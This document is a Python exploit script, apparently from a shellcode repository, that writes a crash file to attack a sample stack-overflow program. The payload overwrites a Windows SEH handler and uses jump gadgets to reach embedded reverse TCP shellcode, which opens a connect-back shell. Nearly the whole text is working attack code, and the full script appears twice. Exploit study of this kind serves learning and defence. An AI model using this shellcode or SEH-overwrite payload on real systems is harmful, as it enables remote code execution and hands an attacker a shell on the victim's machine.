e3prom/generic-stack-overflow-file-exploit.py

## generic-stack-overflow-file-exploit.py
# generic-stack-overflow-file-exploit.py
# Sample exploit code for the generic-stack-overflow-file.c, available at:
# https://github.com/e3prom/shellcode/blob/master/dev/generic-stack-overflow.c
#
# Exploitability:
# There is no direct RP overwrite, however we can control the SE handler pointer at offset 808.
# The SE handler pointer points to a stack pivot.
# This exploit is a little bit messy, I do apologize.
import struct
file = 'crash.txt'

# shellcode is 343 bytes.
# Reverse TCP shellcode (connectback), crafted with love.
shellcode = "\x31\xc0\x64\x8b\x40\x30\x8b\x40\x0c\x8b\x70\x14\xad\x96\xad\x8b\x40\x10\x50\x97\xbe\x8e\x4e\x0e\xec\x31\xc9\x41\x60\x8b\x2c\x24\x8b\x45\x3c\x8b\x54\x05\x78\x01\xea\x8b\x4a\x18\x8b\x5a\x20\x01\xeb\xe3\x30\x49\x8b\x34\x8b\x01\xee\x31\xff\x31\xc0\xfc\xac\x84\xc0\x74\x07\xc1\xcf\x0d\x01\xc7\xeb\xf4\x3b\x7c\x24\x04\x75\xe1\x8b\x5a\x24\x01\xeb\x66\x8b\x0c\x4b\x8b\x5a\x1c\x01\xeb\x8b\x04\x8b\x01\xe8\x89\x44\x24\x1c\x61\x85\xc9\x75\x01\xc3\x50\x31\xc0\x66\xb8\x33\x32\x50\x68\x77\x73\x32\x5f\x89\xe7\x8b\x44\x24\x08\x60\xff\x54\x24\x1c\x68\xde\xad\xc0\xde\x89\x44\x24\x1c\x61\x50\x89\xc7\xbe\xef\x09\xf5\xad\x31\xc9\xe8\x7e\xff\xff\xff\x66\xb9\x21\x02\x29\xc8\x66\xb9\x90\x01\x29\xcc\x89\xe5\x54\x6a\x02\xff\xd0\x31\xc9\x66\xb9\x90\x01\x01\xcc\x58\x31\xc9\x89\xc7\xbe\xd9\x09\xf5\xad\xe8\x54\xff\xff\xff\x50\xbe\xec\xf9\xaa\x60\xe8\x49\xff\xff\xff\x50\x8b\x7c\x24\x14\xbe\x72\xfe\xb3\x16\xe8\x3a\xff\xff\xff\x50\xbe\x7e\xd8\xe2\x73\xe8\x2f\xff\xff\xff\x50\x31\xc0\x50\x50\x50\x50\x40\x50\x40\x50\xff\x54\x24\x24\x89\xc6\x68\x0a\x01\x02\xb1\xb8\x02\x01\x7a\x69\xfe\xcc\x50\x89\xe3\x31\xc0\xb0\x10\x50\x53\x56\xff\x54\x24\x1c\xb8\x31\x63\x6d\x64\xc1\xf8\x08\x50\x54\x31\xc9\xb1\x54\x29\xcc\x89\xe7\x57\x31\xc0\xf3\xaa\x5f\xc6\x07\x44\xfe\x47\x2d\x57\x89\xf0\x8d\x7f\x38\xab\xab\xab\x5f\x31\xc0\x8d\x77\x44\x56\x57\x50\x50\x50\x40\x50\x48\x50\x50\xff\x74\x24\x74\x50\xff\x56\x24"

# SE handler pointer overwrite.
# ADD ESP,14 # MOV EAX,1 # POP EBX # POP ESI # RETN 0x0C
seh = struct.pack('<L', 0x4019d6)

# Gadget #1
# The idea here is to make the instruction we've no control of, unharmful.
# The ADD EAX instruction will take the instructions as an simple operand.
# NOP # NOP # ADD EAX [Unwanted instructions/operand]
gadget = "\x90\x90\x81\xc0"

# Gadget #2
# After the return from SEH chain:
# at EBX + 0x18, we've a pointer to our shellcode.
# We can simply increase EBX 24 times, then jump using the pointer at EBX.
# # INC EBX * 24 # JMP [EBX]
gadget2 = "C" * 24 + '\xff\x23'

nops = "\x90" * 100
padding = 'A' * (800 - len(shellcode + nops))
align = 'B' * 343

payload = nops + shellcode + padding + gadget + seh + gadget2 + align

f = open(file, 'w')
f.write(payload)
print "File", file, "has been created."
f.close()
	# generic-stack-overflow-file-exploit.py
	# Sample exploit code for the generic-stack-overflow-file.c, available at:
	# https://github.com/e3prom/shellcode/blob/master/dev/generic-stack-overflow.c
	#
	# Exploitability:
	# There is no direct RP overwrite, however we can control the SE handler pointer at offset 808.
	# The SE handler pointer points to a stack pivot.
	# This exploit is a little bit messy, I do apologize.
	import struct
	file = 'crash.txt'

	# shellcode is 343 bytes.
	# Reverse TCP shellcode (connectback), crafted with love.
	shellcode = "\x31\xc0\x64\x8b\x40\x30\x8b\x40\x0c\x8b\x70\x14\xad\x96\xad\x8b\x40\x10\x50\x97\xbe\x8e\x4e\x0e\xec\x31\xc9\x41\x60\x8b\x2c\x24\x8b\x45\x3c\x8b\x54\x05\x78\x01\xea\x8b\x4a\x18\x8b\x5a\x20\x01\xeb\xe3\x30\x49\x8b\x34\x8b\x01\xee\x31\xff\x31\xc0\xfc\xac\x84\xc0\x74\x07\xc1\xcf\x0d\x01\xc7\xeb\xf4\x3b\x7c\x24\x04\x75\xe1\x8b\x5a\x24\x01\xeb\x66\x8b\x0c\x4b\x8b\x5a\x1c\x01\xeb\x8b\x04\x8b\x01\xe8\x89\x44\x24\x1c\x61\x85\xc9\x75\x01\xc3\x50\x31\xc0\x66\xb8\x33\x32\x50\x68\x77\x73\x32\x5f\x89\xe7\x8b\x44\x24\x08\x60\xff\x54\x24\x1c\x68\xde\xad\xc0\xde\x89\x44\x24\x1c\x61\x50\x89\xc7\xbe\xef\x09\xf5\xad\x31\xc9\xe8\x7e\xff\xff\xff\x66\xb9\x21\x02\x29\xc8\x66\xb9\x90\x01\x29\xcc\x89\xe5\x54\x6a\x02\xff\xd0\x31\xc9\x66\xb9\x90\x01\x01\xcc\x58\x31\xc9\x89\xc7\xbe\xd9\x09\xf5\xad\xe8\x54\xff\xff\xff\x50\xbe\xec\xf9\xaa\x60\xe8\x49\xff\xff\xff\x50\x8b\x7c\x24\x14\xbe\x72\xfe\xb3\x16\xe8\x3a\xff\xff\xff\x50\xbe\x7e\xd8\xe2\x73\xe8\x2f\xff\xff\xff\x50\x31\xc0\x50\x50\x50\x50\x40\x50\x40\x50\xff\x54\x24\x24\x89\xc6\x68\x0a\x01\x02\xb1\xb8\x02\x01\x7a\x69\xfe\xcc\x50\x89\xe3\x31\xc0\xb0\x10\x50\x53\x56\xff\x54\x24\x1c\xb8\x31\x63\x6d\x64\xc1\xf8\x08\x50\x54\x31\xc9\xb1\x54\x29\xcc\x89\xe7\x57\x31\xc0\xf3\xaa\x5f\xc6\x07\x44\xfe\x47\x2d\x57\x89\xf0\x8d\x7f\x38\xab\xab\xab\x5f\x31\xc0\x8d\x77\x44\x56\x57\x50\x50\x50\x40\x50\x48\x50\x50\xff\x74\x24\x74\x50\xff\x56\x24"

	# SE handler pointer overwrite.
	# ADD ESP,14 # MOV EAX,1 # POP EBX # POP ESI # RETN 0x0C
	seh = struct.pack('<L', 0x4019d6)

	# Gadget #1
	# The idea here is to make the instruction we've no control of, unharmful.
	# The ADD EAX instruction will take the instructions as an simple operand.
	# NOP # NOP # ADD EAX [Unwanted instructions/operand]
	gadget = "\x90\x90\x81\xc0"

	# Gadget #2
	# After the return from SEH chain:
	# at EBX + 0x18, we've a pointer to our shellcode.
	# We can simply increase EBX 24 times, then jump using the pointer at EBX.
	# # INC EBX * 24 # JMP [EBX]
	gadget2 = "C" * 24 + '\xff\x23'

	nops = "\x90" * 100
	padding = 'A' * (800 - len(shellcode + nops))
	align = 'B' * 343

	payload = nops + shellcode + padding + gadget + seh + gadget2 + align

	f = open(file, 'w')
	f.write(payload)
	print "File", file, "has been created."
	f.close()